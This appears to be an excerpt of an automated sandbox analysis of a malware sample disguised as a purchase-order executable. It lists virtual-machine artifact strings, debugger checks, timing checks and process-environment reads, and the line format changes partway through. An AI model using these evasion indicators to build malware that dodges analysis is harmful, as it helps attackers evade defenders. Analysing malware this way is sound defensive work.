          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: Purchase order MIPO2425110032.exe, 00000000.00000002.2047922412.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3289689202.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI call chain: ExitProcess graph end nodegraph_0-86677
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA3558 mov eax, dword ptr fs:[00000030h]0_2_03FA3558
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA34F8 mov eax, dword ptr fs:[00000030h]0_2_03FA34F8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA1EB8 mov eax, dword ptr fs:[00000030h]0_2_03FA1EB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] (12 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] (6 reads); mov ecx, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]; mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] (8 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h] (2 reads); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] (12 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h] (7 reads)
